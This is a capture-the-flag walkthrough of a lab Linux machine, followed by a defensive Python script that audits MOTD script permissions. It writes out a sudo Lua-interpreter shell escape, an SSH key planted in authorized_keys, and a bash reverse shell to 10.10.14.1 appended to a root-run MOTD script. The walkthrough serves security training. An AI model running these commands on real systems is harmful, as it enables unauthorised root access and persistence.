To solve this machine, we begin by enumerating open services, finding ports 22 and 80 open. Going to the website, we are told there is a backdoor installed on the webserver. Looking at the source code, we find a comment that leads us to a GitHub repo of webshells. Trying the filenames on the webserver, we find the backdoor and log in using the credentials in its source code. After getting a shell on the machine, we run sudo -l, which shows us a command we are able to run as sysadmin. Using this tool, we are able to get a shell as sysadmin, giving us user.txt. While monitoring processes, we see a script that copies "Message of the Day" files. Because the copied files are writable by sysadmin and executed by root at login, we are able to get a reverse shell as root and grab the root flag.
Like all machines, we begin by enumerating open services using nmap. Doing so, we see that only ports 22 and 80 are open.
$ nmap -v -p- -T4 10.10.10.181
$ nmap -A -oA scans/nmap-tcp-scripts -p 22,80 10.10.10.181
[...]
# Nmap 7.80 scan initiated Fri Apr 10 14:37:47 2020 as: nmap -A -oA scans/nmap-tcp-scripts -p 22,80 10.10.10.181
Nmap scan report for 10.10.10.181
Host is up (0.053s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 10 14:37:56 2020 -- 1 IP address (1 host up) scanned in 9.00 seconds
Using gobuster to enumerate the webserver for files and directories, we do not find anything of interest.
Going to the webserver, we are told that the website has been hacked and that a backdoor was left open. Looking at the source code of the webpage, we see a comment that hints at the backdoor's location. Googling the comment, we find a GitHub repo that contains many webserver backdoor scripts. Trying these file names against the webserver, we eventually find the backdoor.
With the credentials that are in the source code on GitHub, we are able to log into the backdoor. Using the backdoor console to poke around the machine, we find /home/webadmin/note.txt, which tells us of a tool to practice Lua.
At this point, we (optionally) generate a native reverse shell to upload to the machine for better interaction with the server.
Having gained access to the machine, we begin enumeration tasks. After running sudo -l, we see that we are able to run a command as the sysadmin user. Additionally, looking at our .bash_history file shows the use of this command.
Based on the syntax in which the command is invoked, we can assume this is the tool note.txt spoke of, and that it is a wrapper for the Lua interpreter. Running the command confirms it.
Checking GTFOBins, we find there is a way to get a shell. Doing so, we get a shell as sysadmin and can read user.txt.
$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
Since we have gained access to the server as sysadmin, we begin enumerating the machine by running LinPEAS; however, we do not find anything of interest. A good task to try next is to monitor processes, which we can do with pspy. Doing so, we see a process running as root that updates/resets the Message of the Day (MOTD) after a 30-second delay.
Changing to the /etc/update-motd.d/ directory, we see that we have write permission as sysadmin to the files copied.
To exploit this, we drop our shell as sysadmin, then upload our SSH public key to /home/webadmin/.ssh/authorized_keys. The hope is that when we SSH into the machine as webadmin, we might get a shell as root (the MOTD scripts are read/executed on login).
$ echo 'public key' >> /home/webadmin/.ssh/authorized_keys
Escalating back to sysadmin, we compare /etc/update-motd.d/00-header to the MOTD shown when we SSH into the machine, which proves this is the file we should edit.
Lastly, we start an ncat listener on our machine, update the MOTD right after the copy/reset is performed, and SSH into the machine as webadmin to get a reverse shell as root. Finally, we can view the root flag.
$ nc -lvnp 4433
$ echo "bash -c 'bash -i >& /dev/tcp/10.10.14.1/4433 0>&1'" >> /etc/update-motd.d/00-header
$ ssh -l webadmin 10.10.10.181
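As an added defensive check (not part of the original write-up), the script below audits a MOTD script directory for the weakness used above: files that root executes at every SSH login but that a non-root user or group can modify. The audit_motd_dir and demo names are my own; demo builds a constructed sample directory with a few deliberately mis-permissioned scripts rather than touching the real /etc/update-motd.d/.

```python
"""Audit an update-motd.d style directory for non-root write access.

Assumption: the escalation on this machine works because a root process
copies scripts into /etc/update-motd.d/ that a non-root user can write, and
pam_motd/sshd runs those scripts as root on login. Any file in that directory
(and the directory itself) should therefore be root-owned and not group- or
world-writable. This is an added example, not code from the write-up.
"""
import os
import stat
import tempfile
from pathlib import Path


def audit_motd_dir(directory: str, expected_uid: int = 0) -> list:
    """Return one (name, problem) tuple per unsafe entry in `directory`.

    The directory itself is checked first, then every entry inside it.
    """
    findings = []
    root = Path(directory)
    for p in [root] + sorted(root.iterdir()):
        st = p.lstat()  # lstat so a symlink is reported rather than followed
        if stat.S_ISLNK(st.st_mode):
            findings.append((p.name, "is a symlink"))
            continue
        if st.st_uid != expected_uid:
            findings.append((p.name, f"owned by uid {st.st_uid}, expected {expected_uid}"))
        if st.st_mode & stat.S_IWGRP:
            findings.append((p.name, "group-writable"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((p.name, "world-writable"))
    return findings


def demo() -> list:
    """Build a constructed sample directory and audit it.

    Uses the current uid as the expected owner so the example runs unprivileged;
    on a real host you would call audit_motd_dir("/etc/update-motd.d") with the
    default expected_uid of 0.
    """
    d = tempfile.mkdtemp()
    os.chmod(d, 0o755)
    # Constructed sample scripts: 00-header is fine, the other two are not.
    samples = {"00-header": 0o755, "10-help-text": 0o775, "50-landscape": 0o777}
    for name, mode in samples.items():
        f = Path(d, name)
        f.write_text("#!/bin/sh\necho sample\n")
        os.chmod(f, mode)
    return audit_motd_dir(d, expected_uid=os.getuid())
```

On the box in this write-up, the copied files would show up as group- or world-writable findings; fixing the copy step so the files land as root-owned mode 0755 (or replacing the copy with a dedicated, non-writable script) closes the escalation path.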
Thank you for taking the time to read my write-up. I am interested in other ways this machine has been solved. Feel free to reach out to me and we can discuss it. Thanks!